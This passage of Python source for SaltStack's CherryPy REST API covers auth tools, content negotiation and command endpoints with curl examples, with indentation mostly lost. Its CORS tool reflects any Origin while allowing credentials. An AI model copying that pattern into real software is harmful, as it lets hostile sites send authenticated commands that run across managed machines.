A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request.
.. glossary::
lowstate
A dictionary containing various keys that instruct Salt which command
to run, where that command lives, any parameters for that command, any
authentication credentials, what returner to use, etc.
Salt uses the lowstate data format internally in many places to pass
command data between functions. Salt also uses lowstate for the
:ref:`LocalClient() <python-api>` Python API interface.
The following example (in JSON format) causes Salt to execute two commands::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
import collections
import itertools
import functools
import logging
import json
import time
from multiprocessing import Process, Pipe
# Import third-party libs
import cherrypy
from cherrypy.lib import cpstats
import yaml
# Import Salt libs
import salt
import salt.auth
import salt.exceptions
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
    if 'token' not in cherrypy.session:
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
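# For example, a request sent with "Accept: application/x-yaml" is serialised
# with yaml.safe_dump above, while "Accept: application/json" selects
# json.dumps; hypermedia_handler() below picks the best match for the request.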
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except salt.exceptions.EauthAuthenticationError:
raise cherrypy.HTTPError(401)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
            'return': '{0}'.format(traceback.format_exc())
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
def process_request_body(fn):
    '''
    A decorator to skip a processor function if process_request_body is False
    '''
    @functools.wraps(fn)
    def wrapped(*args, **kwargs):  # pylint: disable=C0111
        if cherrypy.request.process_request_body is not False:
            fn(*args, **kwargs)
    return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
if (cherrypy.request.headers['Content-Type']
== 'application/x-www-form-urlencoded'):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
        if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
# Grab all available client interfaces
clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
predicate=inspect.ismethod) if not name.startswith('__')]
clients.remove('run') # run method calls client interfaces
return {
'return': "Welcome",
'clients': clients,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request**::
% curl -si https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e" \\
-d client=local \\
-d tgt='*' \\
-d fun='test.ping' \\
-d arg
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&arg&client=local&tgt=*
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request**::
% curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response**:
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request**::
% curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
perms = eauth.get(token['name'], eauth.get('*'))
if perms is None:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
data: {'tag': '', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
data: {'tag': '20130802115730568475', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
            // Note, you must be authenticated!
var source = new EventSource('/events');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) { console.debug(e.data) };
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events', {withCredentials: true});
Some browser clients lack CORS support for the ``EventSource()`` API. Such
        clients may instead pass the :mailheader:`X-Auth-Token` value as a URL
parameter::
% curl -NsS localhost:8000/events/6d1b722e
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
% curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
% curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
        # Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
            orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
            salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
                data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side::
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request**::
curl -NsS \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: http://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: http://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie::
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
            var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
        The examples above show how to establish a websocket connection to Salt
        and activate real-time updates from Salt's event stream by signaling
        ``websocket client ready``.
'''
        # Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
            orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
            salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
